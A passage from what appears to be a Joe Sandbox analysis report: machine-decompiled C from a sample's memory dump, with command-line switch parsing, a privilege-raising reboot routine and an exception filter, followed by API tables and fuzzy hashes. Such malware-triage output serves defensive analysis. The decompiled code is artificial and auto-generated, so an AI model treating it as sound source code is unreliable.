                                                                                                                                                                                                        														_t202 = _t50;
                                                                                                                                                                                                        														do {
                                                                                                                                                                                                        															_t88 =  *_t183;
                                                                                                                                                                                                        															_t183 = _t183 + 1;
                                                                                                                                                                                                        														} while (_t88 != 0);
                                                                                                                                                                                                        														if(_t183 == _t202) {
                                                                                                                                                                                                        															goto L49;
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															_t205 = 0x5b;
                                                                                                                                                                                                        															if(E00DE667F(_t215, _t205) == 0) {
                                                                                                                                                                                                        																L115:
                                                                                                                                                                                                        																_t206 = 0x5d;
                                                                                                                                                                                                        																if(E00DE667F(_t215, _t206) == 0) {
                                                                                                                                                                                                        																	L117:
                                                                                                                                                                                                        																	_t202 =  &_v276;
                                                                                                                                                                                                        																	_v276 = _t167;
                                                                                                                                                                                                        																	if(E00DE5C17(_t215,  &_v276) == 0) {
                                                                                                                                                                                                        																		goto L49;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		_t202 = 0x104;
                                                                                                                                                                                                        																		E00DE1680(0xde8c42, 0x104, _v276 + _t167 +  &_v268);
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	_t202 = 0x5b;
                                                                                                                                                                                                        																	if(E00DE667F(_t215, _t202) == 0) {
                                                                                                                                                                                                        																		goto L49;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		goto L117;
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																_t202 = 0x5d;
                                                                                                                                                                                                        																if(E00DE667F(_t215, _t202) == 0) {
                                                                                                                                                                                                        																	goto L49;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	goto L115;
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													 *0xde8a24 = 1;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												goto L50;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t100 = _t87 - 1;
                                                                                                                                                                                                        												if(_t100 == 0) {
                                                                                                                                                                                                        													L98:
                                                                                                                                                                                                        													if(_v266 != 0x3a) {
                                                                                                                                                                                                        														goto L49;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                        														_t217 =  &_v268 + _t170;
                                                                                                                                                                                                        														_t192 =  &_v268 + _t170;
                                                                                                                                                                                                        														_t38 = _t192 + 1; // 0x1
                                                                                                                                                                                                        														_t202 = _t38;
                                                                                                                                                                                                        														do {
                                                                                                                                                                                                        															_t101 =  *_t192;
                                                                                                                                                                                                        															_t192 = _t192 + 1;
                                                                                                                                                                                                        														} while (_t101 != 0);
                                                                                                                                                                                                        														if(_t192 == _t202) {
                                                                                                                                                                                                        															goto L49;
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															_t202 =  &_v276;
                                                                                                                                                                                                        															_v276 = _t170;
                                                                                                                                                                                                        															if(E00DE5C17(_t217,  &_v276) == 0) {
                                                                                                                                                                                                        																goto L49;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																_t104 = CharUpperA(_v267);
                                                                                                                                                                                                        																_t218 = 0xde8b3e;
                                                                                                                                                                                                        																_t105 = _v276;
                                                                                                                                                                                                        																if(_t104 != 0x54) {
                                                                                                                                                                                                        																	_t218 = 0xde8a3a;
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        																E00DE1680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                                                                                                                                                        																_t202 = 0x104;
                                                                                                                                                                                                        																E00DE658A(_t218, 0x104, 0xde1140);
                                                                                                                                                                                                        																if(E00DE31E0(_t218) != 0) {
                                                                                                                                                                                                        																	goto L50;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	goto L106;
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_t111 = _t100 - 0xa;
                                                                                                                                                                                                        													if(_t111 == 0) {
                                                                                                                                                                                                        														if(_v266 != 0) {
                                                                                                                                                                                                        															if(_v266 != 0x3a) {
                                                                                                                                                                                                        																goto L49;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																_t199 = _v265;
                                                                                                                                                                                                        																if(_t199 != 0) {
                                                                                                                                                                                                        																	_t219 =  &_v265;
                                                                                                                                                                                                        																	do {
                                                                                                                                                                                                        																		_t219 = _t219 + 1;
                                                                                                                                                                                                        																		_t115 = CharUpperA(_t199) - 0x45;
                                                                                                                                                                                                        																		if(_t115 == 0) {
                                                                                                                                                                                                        																			 *0xde8a2c = 1;
                                                                                                                                                                                                        																		} else {
                                                                                                                                                                                                        																			_t200 = 2;
                                                                                                                                                                                                        																			_t119 = _t115 - _t200;
                                                                                                                                                                                                        																			if(_t119 == 0) {
                                                                                                                                                                                                        																				 *0xde8a30 = 1;
                                                                                                                                                                                                        																			} else {
                                                                                                                                                                                                        																				if(_t119 == 0xf) {
                                                                                                                                                                                                        																					 *0xde8a34 = 1;
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t209 = 0;
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																			}
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																		_t118 =  *_t219;
                                                                                                                                                                                                        																		_t199 = _t118;
                                                                                                                                                                                                        																	} while (_t118 != 0);
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															 *0xde8a2c = 1;
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        														goto L50;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														_t127 = _t111 - 3;
                                                                                                                                                                                                        														if(_t127 == 0) {
                                                                                                                                                                                                        															if(_v266 != 0) {
                                                                                                                                                                                                        																if(_v266 != 0x3a) {
                                                                                                                                                                                                        																	goto L49;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	_t129 = CharUpperA(_v265);
                                                                                                                                                                                                        																	if(_t129 == 0x31) {
                                                                                                                                                                                                        																		goto L76;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		if(_t129 == 0x41) {
                                                                                                                                                                                                        																			goto L83;
                                                                                                                                                                                                        																		} else {
                                                                                                                                                                                                        																			if(_t129 == 0x55) {
                                                                                                                                                                                                        																				goto L76;
                                                                                                                                                                                                        																			} else {
                                                                                                                                                                                                        																				goto L49;
                                                                                                                                                                                                        																			}
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																L76:
                                                                                                                                                                                                        																_push(2);
                                                                                                                                                                                                        																_pop(1);
                                                                                                                                                                                                        																L83:
                                                                                                                                                                                                        																 *0xde8a38 = 1;
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        															goto L50;
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															_t132 = _t127 - 1;
                                                                                                                                                                                                        															if(_t132 == 0) {
                                                                                                                                                                                                        																if(_v266 != 0) {
                                                                                                                                                                                                        																	if(_v266 != 0x3a) {
                                                                                                                                                                                                        																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                                                                                                                                                        																			goto L49;
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		_t201 = _v265;
                                                                                                                                                                                                        																		 *0xde9a2c = 1;
                                                                                                                                                                                                        																		if(_t201 != 0) {
                                                                                                                                                                                                        																			_t220 =  &_v265;
                                                                                                                                                                                                        																			do {
                                                                                                                                                                                                        																				_t220 = _t220 + 1;
                                                                                                                                                                                                        																				_t142 = CharUpperA(_t201) - 0x41;
                                                                                                                                                                                                        																				if(_t142 == 0) {
                                                                                                                                                                                                        																					_t143 = 2;
                                                                                                                                                                                                        																					 *0xde9a2c =  *0xde9a2c | _t143;
                                                                                                                                                                                                        																					goto L70;
                                                                                                                                                                                                        																				} else {
                                                                                                                                                                                                        																					_t145 = _t142 - 3;
                                                                                                                                                                                                        																					if(_t145 == 0) {
                                                                                                                                                                                                        																						 *0xde8d48 =  *0xde8d48 | 0x00000040;
                                                                                                                                                                                                        																					} else {
                                                                                                                                                                                                        																						_t146 = _t145 - 5;
                                                                                                                                                                                                        																						if(_t146 == 0) {
                                                                                                                                                                                                        																							 *0xde9a2c =  *0xde9a2c & 0xfffffffd;
                                                                                                                                                                                                        																							goto L70;
                                                                                                                                                                                                        																						} else {
                                                                                                                                                                                                        																							_t147 = _t146 - 5;
                                                                                                                                                                                                        																							if(_t147 == 0) {
                                                                                                                                                                                                        																								 *0xde9a2c =  *0xde9a2c & 0xfffffffe;
                                                                                                                                                                                                        																								goto L70;
                                                                                                                                                                                                        																							} else {
                                                                                                                                                                                                        																								_t149 = _t147;
                                                                                                                                                                                                        																								if(_t149 == 0) {
                                                                                                                                                                                                        																									 *0xde8d48 =  *0xde8d48 | 0x00000080;
                                                                                                                                                                                                        																								} else {
                                                                                                                                                                                                        																									if(_t149 == 3) {
                                                                                                                                                                                                        																										 *0xde9a2c =  *0xde9a2c | 0x00000004;
                                                                                                                                                                                                        																										L70:
                                                                                                                                                                                                        																										 *0xde8a28 = 1;
                                                                                                                                                                                                        																									} else {
                                                                                                                                                                                                        																										_t209 = 0;
                                                                                                                                                                                                        																									}
                                                                                                                                                                                                        																								}
                                                                                                                                                                                                        																							}
                                                                                                                                                                                                        																						}
                                                                                                                                                                                                        																					}
                                                                                                                                                                                                        																				}
                                                                                                                                                                                                        																				_t144 =  *_t220;
                                                                                                                                                                                                        																				_t201 = _t144;
                                                                                                                                                                                                        																			} while (_t144 != 0);
                                                                                                                                                                                                        																		}
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	 *0xde9a2c = 3;
                                                                                                                                                                                                        																	 *0xde8a28 = 1;
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        																goto L50;
                                                                                                                                                                                                        															} else {
                                                                                                                                                                                                        																if(_t132 == 0) {
                                                                                                                                                                                                        																	goto L98;
                                                                                                                                                                                                        																} else {
                                                                                                                                                                                                        																	L49:
                                                                                                                                                                                                        																	_t209 = 0;
                                                                                                                                                                                                        																	L50:
                                                                                                                                                                                                        																	_t173 = _v272;
                                                                                                                                                                                                        																	if( *_t173 != 0) {
                                                                                                                                                                                                        																		goto L2;
                                                                                                                                                                                                        																	} else {
                                                                                                                                                                                                        																		break;
                                                                                                                                                                                                        																	}
                                                                                                                                                                                                        																}
                                                                                                                                                                                                        															}
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											goto L106;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										L34:
                                                                                                                                                                                                        										_t209 = 0;
                                                                                                                                                                                                        										break;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L131;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					if( *0xde8a2c != 0 &&  *0xde8b3e == 0) {
                                                                                                                                                                                                        						if(GetModuleFileNameA( *0xde9a3c, 0xde8b3e, 0x104) == 0) {
                                                                                                                                                                                                        							_t209 = 0;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t202 = 0x5c;
                                                                                                                                                                                                        							 *((char*)(E00DE66C8(0xde8b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t63 = _t209;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				L131:
                                                                                                                                                                                                        			}

                                                                                                                                                                                                        0x00de5dca
                                                                                                                                                                                                        0x00de5e22
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5dcc
                                                                                                                                                                                                        0x00de5dce
                                                                                                                                                                                                        0x00de5e24
                                                                                                                                                                                                        0x00de5e24
                                                                                                                                                                                                        0x00de5e2c
                                                                                                                                                                                                        0x00de5e47
                                                                                                                                                                                                        0x00de5e4a
                                                                                                                                                                                                        0x00de61d2
                                                                                                                                                                                                        0x00de61e2
                                                                                                                                                                                                        0x00de61e7
                                                                                                                                                                                                        0x00de61ee
                                                                                                                                                                                                        0x00de61f1
                                                                                                                                                                                                        0x00de61f1
                                                                                                                                                                                                        0x00de61f8
                                                                                                                                                                                                        0x00de61f8
                                                                                                                                                                                                        0x00de5e50
                                                                                                                                                                                                        0x00de5e53
                                                                                                                                                                                                        0x00de6109
                                                                                                                                                                                                        0x00de611f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de6125
                                                                                                                                                                                                        0x00de6137
                                                                                                                                                                                                        0x00de613a
                                                                                                                                                                                                        0x00de613c
                                                                                                                                                                                                        0x00de613e
                                                                                                                                                                                                        0x00de613e
                                                                                                                                                                                                        0x00de6141
                                                                                                                                                                                                        0x00de6141
                                                                                                                                                                                                        0x00de6143
                                                                                                                                                                                                        0x00de6144
                                                                                                                                                                                                        0x00de614a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de6150
                                                                                                                                                                                                        0x00de6152
                                                                                                                                                                                                        0x00de615c
                                                                                                                                                                                                        0x00de6170
                                                                                                                                                                                                        0x00de6172
                                                                                                                                                                                                        0x00de617c
                                                                                                                                                                                                        0x00de6190
                                                                                                                                                                                                        0x00de6190
                                                                                                                                                                                                        0x00de6196
                                                                                                                                                                                                        0x00de61a5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de61ab
                                                                                                                                                                                                        0x00de61b9
                                                                                                                                                                                                        0x00de61c6
                                                                                                                                                                                                        0x00de61c6
                                                                                                                                                                                                        0x00de617e
                                                                                                                                                                                                        0x00de6180
                                                                                                                                                                                                        0x00de618a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de618a
                                                                                                                                                                                                        0x00de615e
                                                                                                                                                                                                        0x00de6160
                                                                                                                                                                                                        0x00de616a
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de616a
                                                                                                                                                                                                        0x00de615c
                                                                                                                                                                                                        0x00de614a
                                                                                                                                                                                                        0x00de610b
                                                                                                                                                                                                        0x00de610e
                                                                                                                                                                                                        0x00de610e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5e59
                                                                                                                                                                                                        0x00de5e59
                                                                                                                                                                                                        0x00de5e5c
                                                                                                                                                                                                        0x00de604f
                                                                                                                                                                                                        0x00de6056
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de605c
                                                                                                                                                                                                        0x00de606e
                                                                                                                                                                                                        0x00de6071
                                                                                                                                                                                                        0x00de6073
                                                                                                                                                                                                        0x00de6075
                                                                                                                                                                                                        0x00de6075
                                                                                                                                                                                                        0x00de6078
                                                                                                                                                                                                        0x00de6078
                                                                                                                                                                                                        0x00de607a
                                                                                                                                                                                                        0x00de607b
                                                                                                                                                                                                        0x00de6081
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de6087
                                                                                                                                                                                                        0x00de6087
                                                                                                                                                                                                        0x00de608d
                                                                                                                                                                                                        0x00de609c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de60a2
                                                                                                                                                                                                        0x00de60aa
                                                                                                                                                                                                        0x00de60b2
                                                                                                                                                                                                        0x00de60b7
                                                                                                                                                                                                        0x00de60bd
                                                                                                                                                                                                        0x00de60bf
                                                                                                                                                                                                        0x00de60bf
                                                                                                                                                                                                        0x00de60d6
                                                                                                                                                                                                        0x00de60e0
                                                                                                                                                                                                        0x00de60e7
                                                                                                                                                                                                        0x00de60f5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de60f5
                                                                                                                                                                                                        0x00de609c
                                                                                                                                                                                                        0x00de6081
                                                                                                                                                                                                        0x00de5e62
                                                                                                                                                                                                        0x00de5e62
                                                                                                                                                                                                        0x00de5e65
                                                                                                                                                                                                        0x00de5fd3
                                                                                                                                                                                                        0x00de5fe9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de5fef
                                                                                                                                                                                                        0x00de5fef
                                                                                                                                                                                                        0x00de5ff7
                                                                                                                                                                                                        0x00de5ffd
                                                                                                                                                                                                        0x00de6003
                                                                                                                                                                                                        0x00de6006
                                                                                                                                                                                                        0x00de6011
                                                                                                                                                                                                        0x00de6014
                                                                                                                                                                                                        0x00de603d
                                                                                                                                                                                                        0x00de6016

APIs
• CharNextA.USER32(?,00000000,?,?), ref: 00DE5CEE
• GetModuleFileNameA.KERNEL32(00DE8B3E,00000104,00000000,?,?), ref: 00DE5DFC
• CharUpperA.USER32(?), ref: 00DE5E3E
• CharUpperA.USER32(-00000052), ref: 00DE5EE1
• CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00DE5F6F
• CharUpperA.USER32(?), ref: 00DE5FA7
• CharUpperA.USER32(-0000004E), ref: 00DE6008
• CharUpperA.USER32(?), ref: 00DE60AA
• CloseHandle.KERNEL32(00000000,00DE1140,00000000,00000040,00000000), ref: 00DE61F1
• ExitProcess.KERNEL32 ref: 00DE61F8
Strings
Memory Dump Source
• Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                        • String ID: "$"$:$RegServer
                                                                                                                                                                                                        • API String ID: 1203814774-25366791
                                                                                                                                                                                                        • Opcode ID: 2cf47147b6e0b25073d082a287b5d886e817d854ac07ff8d79934dd4b66e1c6e
                                                                                                                                                                                                        • Instruction ID: e50d730f4bdf77168a42af0e96887211bd62f73555bee0638abab48ed3c8ef5f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2cf47147b6e0b25073d082a287b5d886e817d854ac07ff8d79934dd4b66e1c6e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 35D13B71A04BD45ADF35BB3BAC483B977619B253C8F1C01E9D4D6D6299DA70CE828B30
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 60%
                                                                                                                                                                                                        			E00DE1F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				int _v12;
                                                                                                                                                                                                        				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                        				void* _v28;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				signed int _t13;
                                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                                        				void* _t25;
                                                                                                                                                                                                        				int _t28;
                                                                                                                                                                                                        				signed char _t30;
                                                                                                                                                                                                        				void* _t38;
                                                                                                                                                                                                        				void* _t40;
                                                                                                                                                                                                        				void* _t41;
                                                                                                                                                                                                        				signed int _t46;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t41 = __esi;
                                                                                                                                                                                                        				_t38 = __edi;
                                                                                                                                                                                                        				_t30 = __ecx;
                                                                                                                                                                                                        				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                        						L14:
                                                                                                                                                                                                        						if( *0xde9a40 != 0) {
                                                                                                                                                                                                        							_pop(_t30);
                                                                                                                                                                                                        							_t44 = _t46;
                                                                                                                                                                                                        							_t13 =  *0xde8004; // 0xb4dd4fdf
                                                                                                                                                                                                        							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                        							_push(_t38);
                                                                                                                                                                                                        							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                        								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                        								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                        								_v12 = 2;
                                                                                                                                                                                                        								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                        								CloseHandle(_v28);
                                                                                                                                                                                                        								_t41 = _t41;
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								if(_t21 != 0) {
                                                                                                                                                                                                        									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                        										_t25 = 1;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t37 = 0x4f7;
                                                                                                                                                                                                        										goto L3;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t37 = 0x4f6;
                                                                                                                                                                                                        									goto L4;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								_t37 = 0x4f5;
                                                                                                                                                                                                        								L3:
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								L4:
                                                                                                                                                                                                        								_push(0x10);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								E00DE44B9(0, _t37);
                                                                                                                                                                                                        								_t25 = 0;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_pop(_t40);
                                                                                                                                                                                                        							return E00DE6CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t37 = 0x522;
                                                                                                                                                                                                        						_t28 = E00DE44B9(0, 0x522, 0xde1140, 0, 0x40, 4);
                                                                                                                                                                                                        						if(_t28 != 6) {
                                                                                                                                                                                                        							goto L16;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					__eax = E00DE1EA7(__ecx);
                                                                                                                                                                                                        					if(__eax != 2) {
                                                                                                                                                                                                        						L16:
                                                                                                                                                                                                        						return _t28;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						goto L12;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}

















                                                                                                                                                                                                        0x00de1f86
                                                                                                                                                                                                        0x00de1f8f
                                                                                                                                                                                                        0x00de1fcf
                                                                                                                                                                                                        0x00de1fd3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de1fd3
                                                                                                                                                                                                        0x00de1fa9
                                                                                                                                                                                                        0x00de1fb4
                                                                                                                                                                                                        0x00de1fbb
                                                                                                                                                                                                        0x00de1fc3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de1fc3
                                                                                                                                                                                                        0x00de1f9a
                                                                                                                                                                                                        0x00de1f9a
                                                                                                                                                                                                        0x00de1fa2
                                                                                                                                                                                                        0x00de1fd9
                                                                                                                                                                                                        0x00de1fda
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00de1fa2

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00DE1EFB
                                                                                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00DE1F02
                                                                                                                                                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 00DE1FD3
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                        • String ID: SeShutdownPrivilege
                                                                                                                                                                                                        • API String ID: 2795981589-3733053543
                                                                                                                                                                                                        • Opcode ID: ccf96675e4d486cd27ae4fcc85235b22a3d246c14c7e0ef05e52a51503a2f6c3
                                                                                                                                                                                                        • Instruction ID: 0fccf3d7b890bcb0dc49a029f66eab92ecabcc7d83a0c9344fd3bfcc5209e949
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ccf96675e4d486cd27ae4fcc85235b22a3d246c14c7e0ef05e52a51503a2f6c3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6D21E7B6B403856BDB207BA69C4AFBF77B8EF85B11F140018FA06DA185DB74D80192B1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00DE6CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                                                                                                                        
                                                                                                                                                                                                        				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                        				UnhandledExceptionFilter(_a4);
                                                                                                                                                                                                        				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                        			}



                                                                                                                                                                                                        0x00de6cf7
                                                                                                                                                                                                        0x00de6d00
                                                                                                                                                                                                        0x00de6d19

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00DE6E26,00DE1000), ref: 00DE6CF7
                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(00DE6E26,?,00DE6E26,00DE1000), ref: 00DE6D00
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(C0000409,?,00DE6E26,00DE1000), ref: 00DE6D0B
                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,00DE6E26,00DE1000), ref: 00DE6D12
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.410834336.0000000000DE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.410820106.0000000000DE0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410848458.0000000000DE8000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEA000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        • Associated: 00000003.00000002.410860508.0000000000DEC000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_de0000_sQm37qN82.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3231755760-0
                                                                                                                                                                                                        • Opcode ID: f0f3570790a1a2aff11c3325e067481950af92780bcca7c4b997be0fb427b34e
                                                                                                                                                                                                        • Instruction ID: 871c93c5d9f1906eec9bc32cc86af41ce3f12af9552790f4276e53ebaebc153c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f0f3570790a1a2aff11c3325e067481950af92780bcca7c4b997be0fb427b34e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 15D0C932000389BBDB003BE9EC4CA593F28EB49212F454004F31DCA220CA3264518B72
                                                                                                                                                                                                        Uniqueness

